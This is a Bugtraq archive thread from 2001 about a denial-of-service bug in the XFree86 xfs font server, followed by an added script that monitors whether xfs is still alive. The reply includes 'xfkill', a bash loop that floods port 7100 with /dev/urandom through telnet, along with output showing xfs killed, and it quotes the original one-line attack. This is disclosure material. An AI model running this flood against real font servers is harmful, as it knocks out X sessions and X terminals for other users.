Bugtraq mailing list archives
Re:XFree86-xfs-4.0.1-1 DoS
From: "Mathias Dybvik" <tmdybvik () hotmail com>
Date: Sun, 10 Jun 2001 03:16:42 -0400
Confirmed, on Mandrake 8.0. I should, however, point out that I was only able to take down the font-server as a local user, and not from a remote host. This could be a bandwidth problem, caused by the fact that I only have a measly 10Mb/s LAN. Then again, my urandom bandwidth is less than half of that, so I'm not sure what gives...
The moral of the story is that (at least) any local user can kill the xfs process. This has dire consequences for any user either using X on that box, or using an x-terminal relying on that fontserver.
[user@userland ~]$ ps -ax|grep xfs
 9363 ?        S      0:00 xfs -port 7100 -daemon -user xfs
 9574 pts/1    S      0:00 grep xfs
[user@userland ~]$./xfkill
[user@userland ~]$ ps -ax|grep xfs
 9626 pts/1    S      0:00 grep xfs

$cat xfkill
[user@userland ~]$ cat xfkill
#!/bin/bash
XFSPORT=7100
XFS_IP=192.168.1.254
for ((COUNT=0;COUNT<500;COUNT=$COUNT+1))
do
  echo sending garbage to $XFSPORT pass $COUNT
  telnet $XFS_IP $XFSPORT </dev/urandom &>/dev/null
done

Version information:

$ rpm -qi XFree86-xfs
Name        : XFree86-xfs                  Relocations: (not relocateable)
Version     : 4.0.3                             Vendor: MandrakeSoft
Release     : 7mdk                          Build Date: Sun 08 Apr 2001 08
Install date: Mon 23 Apr 2001 09:32:49 PM UTC   Build Host: bi.mandrake
Group       : System/Servers                Source RPM: XFree86-4.0.3-7mdk
Size        : 536213                           License: MIT
Summary     : Font server for XFree86
Original Message <<<<<<<<<<<<<<<<<<
On 6/6/01, 2:31:49 PM, Jarosław Zachwieja <grok () mhd pl> wrote regarding XFree86-xfs-4.0.1-1 DoS:
Hello,
xfs from the package XFree86-xfs-4.0.1-1 (i386.rpm), RedHat 7.0 seems to suffer from a Denial of Service attack. To cause xfs to stop responding to requests, try to do the following:
$ telnet victim xfs </dev/urandom
Repeat about 100 (or 1000) times and you get Connection refused message.
Regular Xservers can no longer connect, usually crash stating Could not open default font 'fixed' and probably get disabled for 5 minutes if run from inittab.
I'd appreciate any successful/unsuccessful attempts of reproducing this behaviour.
Regards, -- Valentine M. Smith
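For anyone monitoring a font server against the failure described in this thread, the following check is an added example, not part of either message. It tells apart "no xfs process left" (the Mandrake result above) from "xfs listed but the font port refuses connections", and counts the "could not open default font" symptom in an X server log. The state names, the `--live` switch and the log excerpt are assumptions made for the example.

```shell
#!/bin/bash
# Added example (not from the thread): tell the reported xfs failure states apart.
# PS_* samples are copied from the session in the message; the log is constructed.
PS_BEFORE='9363 ? S 0:00 xfs -port 7100 -daemon -user xfs
9574 pts/1 S 0:00 grep xfs'
PS_AFTER='9626 pts/1 S 0:00 grep xfs'
XLOG_SAMPLE="Fatal server error:
could not open default font 'fixed'"     # constructed log excerpt

# Read `ps -ax` output on stdin and print the PIDs whose command is xfs.
# Matching the command column (5th field) skips the "grep xfs" line itself.
xfs_pids() {
    awk '{ cmd = $5; sub(/^.*\//, "", cmd); if (cmd == "xfs") print $1 }'
}

# Count X server log lines (stdin) that show the client-side symptom.
font_errors() {
    grep -ci "could not open default font" || true
}

# probe_port HOST PORT: print "open" if a TCP connect succeeds within 3 s,
# otherwise "closed". Uses bash's /dev/tcp and coreutils timeout.
probe_port() {
    if timeout 3 bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$1" "$2" 2>/dev/null
    then echo open; else echo closed; fi
}

# classify_xfs PS_TEXT PROBE: the state names are labels chosen for this example.
classify_xfs() {
    if [ -z "$(printf '%s\n' "$1" | xfs_pids)" ]; then
        echo dead            # no xfs process left (the Mandrake 8.0 result)
    elif [ "$2" != open ]; then
        echo not-accepting   # process listed, but the font port refuses connections
    else
        echo ok
    fi
}

if [ "${1:-}" = "--live" ]; then   # run on the font-server host itself
    classify_xfs "$(ps -ax)" "$(probe_port "${2:-127.0.0.1}" "${3:-7100}")"
else                               # offline demo on the sample data above
    echo "before: $(classify_xfs "$PS_BEFORE" open)"
    echo "after:  $(classify_xfs "$PS_AFTER" closed)"
    echo "font errors in log: $(printf '%s\n' "$XLOG_SAMPLE" | font_errors)"
fi
```

Run with `--live` from cron or a supervisor on the font-server host, so that a dead or non-accepting xfs is noticed before X servers and X terminals fail on the missing 'fixed' font.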
Current thread:
- XFree86-xfs-4.0.1-1 DoS Jarosław Zachwieja (Jun 08)
- <Possible follow-ups>
- Re:XFree86-xfs-4.0.1-1 DoS Mathias Dybvik (Jun 10)
- Re:XFree86-xfs-4.0.1-1 DoS Mathias Dybvik (Jun 11)